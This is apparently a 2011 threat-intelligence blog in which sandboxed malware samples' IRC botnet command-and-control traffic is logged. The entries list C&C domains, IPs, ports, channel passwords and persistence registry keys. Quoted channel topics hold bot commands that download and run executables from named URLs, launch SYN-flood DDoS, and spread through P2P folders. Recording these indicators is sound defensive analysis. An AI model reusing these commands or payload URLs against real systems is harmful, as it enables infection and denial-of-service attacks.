Botnet C&C irc
dns.googleure.com DNS_TYPE_A 92.241.164.227
92.241.164.227:1234
Nick: n{US|XPa}xvwpyyv
Username: xvwpyyv
Server Pass: null
Joined Channel: #!ngr! with Password ngrBot
Joined Channel: #US
Channel Topic for Channel #!ngr!: ".mod pdef off .s .j -c IT,ITA,ES,ESP,FR,FRA #uz4 .up http://jeanie.ws/new.exe 3c62c54ff04ae4af8262ae4d5e2683c7"
Private Message to Channel #!ngr!: "[d="http://jeanie.ws/new.exe" s="278528 bytes"] Updated bot file "C:\Documents and Settings\Administrator\Application Data\Dekfki.exe""
Thursday, February 24, 2011
dns.googleure.com
Posted by Role at 12:42 AM 0 comments
Wednesday, February 9, 2011
m3rcil3ss.co.cc ( infeCTeD )
Botnet C&C irc
m3rcil3ss.co.cc DNS_TYPE_A 212.252.34.199
212.252.34.199:6667
Nick: [AUS|XP|620207]
Username: onfkyav
Server Pass: m3rc
Joined Channel: #m3rc with Password k\xfcrt
Channel Topic for Channel #m3rc: ".p2p"
Private Message to Channel #m3rc: "[p2p]: Spreading to p2p folders."
Private Message to User [AUS|XP|620207]: "VERSION"
Process Created:
C:\WINDOWS\upterd.exe
Registry Created:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\ info Windows Services upterd.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ info Windows Services upterd.exe
Posted by Role at 8:55 PM 0 comments
urcdw.zavoddebila.com ( OgarD / virus )
Botnet C&C irc
urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38
72.20.14.38:33333
Nick: {NOVA}[USA][XP-SP3]610119
Username: VirUs
VirUs "" "lol" :My_Name_iS_PIG_and_Iam_A_GaY
Joined Channel: ##Turb0-XXX##
Channel Topic for Channel ##Turb0-XXX##: "!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe"
Private Message to Channel ##Turb0-XXX##: "Executed process "fsaf24.exe"."
Private Message to Channel ##Turb0-XXX##: "Download failed!"
Private Message to Channel ##Turb0-XXX##: "Executed process "afasfa4.exe"."
Private Message to Channel ##Turb0-XXX##: "Executed process "micro1.exe"."
Process Created:
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\services.exe
Registry Modifield
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ info
MS Service Manager C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\services.exe
Posted by Role at 5:25 PM 0 comments
60.165.98.198
Botnet C&C irc
addr: pantylost.mooo.com ip: 60.165.98.198
addr: marinehh.twilightparadox.com ip: 60.165.98.198
addr: stockingag.jumpingcrab.com ip: 60.165.98.198
addr: pantylost.crabdance.com ip: 60.165.98.198
addr: onthebreak.UglyAs.com ip: 60.165.98.198
addr: headmefc.AsSexyAs.com ip: 60.165.98.198
addr: computercc.ignorelist.com ip: 60.165.98.198
addr: sandtp.chickenkiller.com ip: 60.165.98.198
addr: greenbarc.IsTheBe.st ip: 60.165.98.198
addr: ringc.strangled.net ip: 60.165.98.198
60.165.98.198:8684
NICK [N00_USA_XP_39922187]
USER SP2-917 * 0 :COMPUTERNAME
Now talking in #blue3
* Topic is '|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gif fewh.exe -s|.asc svrsvc_SP2 100 5 9999 1 -b -e -r -s|.asc svrsvc_SP2 50 5 9999 0 -b -r -s|.join #sd3 -s'
Set by ccc on Tue Dec 28 08:36:24
Now talking in #2k38
Topic is '|.ddosstop -s|.aksyn www.jjj.com 80 9999999 wyn 5000 100 5 0 0 0 0 10 5 0 0 -s'
Set by ccc on Wed Feb 09 17:18:13
Process Created:
C:\WINDOWS\system32\serivces.exe
Services Created:
PlugPlayCM SERVICE_AUTO_START "C:\WINDOWS\system32\serivces.exe"
Posted by Role at 7:09 AM 0 comments
Subscribe to:
Posts (Atom)
